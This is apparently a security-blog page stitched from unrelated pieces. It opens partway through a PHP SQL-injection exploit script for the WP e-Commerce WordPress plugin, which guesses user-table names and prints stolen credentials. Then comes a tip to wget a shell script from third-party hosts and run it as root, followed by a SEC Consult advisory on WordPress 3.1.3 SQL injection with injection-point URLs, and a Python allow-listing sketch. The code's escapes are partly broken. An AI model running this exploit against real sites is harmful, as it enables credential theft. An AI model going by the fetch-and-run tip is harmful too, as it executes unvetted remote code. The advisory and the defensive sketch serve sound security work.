curl_setopt($ch, CURLOPT_POST, 3);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true");
$result= curl_exec ($ch);
curl_close ($ch);
echo "Now using table name: $table... ";
preg_match("/(.*?)< /span>.
/", $result, $matches);
if ( !isset($matches[1]) )
$msg="Wrong table name or not vulnerablen";
else
$msg="Credential found: ".$matches[1]."n";

return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {
if (isset($argv[4]))
$table = $argv[4];
else
$table = "wp_users";

$host = $argv[1];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0))
$host="http://$host";

$path = $argv[2];
$pageid=(int)$argv[3];

/* Detecting the version, if possible */
$version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');
preg_match("/Stable tag: (.*)/", $version, $vmatch);

if ( !isset($vmatch[1]) )
$version="Not detectablen";
else
$version=$vmatch[1];

echo "Version: ".$version."n";
/* End of version detecting */

/* Executing exploit */
preg_match('/[^.]+.[^.]+$/', $host, $hmatch);
$host_name=str_replace('http://','',$hmatch[0]);

$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

foreach($tarray as $index => $val) {
echo exploit($host,$path,$pageid,$val);
}
/* End of exploit */
} else
help();

Source: http://www.exploit-db.com/exploits/17613/

How to check CMS versions quickly and conveniently

To check, download the following tool from one of the two addresses below:

root@appunix:~#wget http://server.cmsversion.com/checktest.sh

or

root@appunix:~#wget http://www.libphp.net/checktest.sh

Then do the following (logindeumacontanomeuserver stands for the login of an account on your server):

root@appunix:~#chmod +x checktest.sh

root@appunix:~#./checktest.sh -u logindeumacontanomeuserver

The output should look like this:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

This tip works for Joomla, WordPress, WHMCS, etc.

WordPress 3.1.3 SQL Injection Vulnerabilities

SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >

=======================================================================
title: Multiple SQL Injection Vulnerabilities
product: WordPress
vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
fixed version: 3.1.4/3.2-RC3
impact: Medium
homepage: http://wordpress.org/
found: 2011-06-21
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001."
Source: http://wordpress.org/about/
Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the "Editor" role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input,  allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
The following URLs could be used to perform blind SQL injection
attacks:
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with "Editor" privileges to inject arbitrary SQL
commands in the "orderby" and "order" parameters passed as array
members to the vulnerable function when sorting links.
The following URL could be used to perform blind SQL injection attacks:
http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]&order=[SQL injection]
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2011-06-22: Contacting vendor through security () wordpress org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory
Solution:
---------
Upgrade to version 3.1.4 or 3.2-RC3
Workaround:
-----------
A more restrictive role, e.g. "Author", could be applied to the user.
Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius / @2011

 

Source: http://www.exploit-db.com/exploits/17465/
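The "orderby" and "order" parameters in the advisory above end up as a column name and a sort keyword, which bound parameters cannot carry, so they need an allow-list instead. The following is an added sketch of that approach in Python with sqlite3; it is not WordPress code and not the vendor's patch, and the table, column names and request values are constructed.

```python
import sqlite3

# Request value -> column actually written into the SQL text.
ORDERBY_COLUMNS = {"name": "name", "count": "post_count", "id": "term_id"}


def build_unsafe(taxonomy, orderby, order):
    """Concatenation: whatever the request carries becomes SQL text."""
    return ("SELECT name FROM terms WHERE taxonomy = '" + taxonomy +
            "' ORDER BY " + orderby + " " + order)


def build_safe(taxonomy, orderby, order):
    """Values are bound; sort column and direction come from fixed sets."""
    column = ORDERBY_COLUMNS.get(str(orderby).strip().lower(), "name")
    direction = "DESC" if str(order).strip().upper() == "DESC" else "ASC"
    sql = ("SELECT name FROM terms WHERE taxonomy = ? "
           f"ORDER BY {column} {direction}")
    return sql, (taxonomy,)


def list_terms(conn, taxonomy, orderby="name", order="ASC"):
    sql, params = build_safe(taxonomy, orderby, order)
    return [row[0] for row in conn.execute(sql, params)]


def make_db():
    """Constructed in-memory table standing in for a terms listing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE terms (term_id INTEGER PRIMARY KEY, "
                 "name TEXT, taxonomy TEXT, post_count INTEGER)")
    conn.executemany(
        "INSERT INTO terms (name, taxonomy, post_count) VALUES (?, ?, ?)",
        [("news", "category", 7), ("alpha", "category", 2),
         ("zeta", "category", 9), ("tag1", "post_tag", 1)])
    return conn


if __name__ == "__main__":
    conn = make_db()
    # Expected use: both values are in the allow-list.
    print(list_terms(conn, "category", "count", "desc"))
    # Unexpected values: the unsafe builder passes them through verbatim,
    # the safe builder falls back to the default column and direction.
    odd_orderby, odd_order = "post_count DESC, term_id", "desc; x"
    print(build_unsafe("category", odd_orderby, odd_order))
    print(build_safe("category", odd_orderby, odd_order)[0])
    print(list_terms(conn, "category", odd_orderby, odd_order))
```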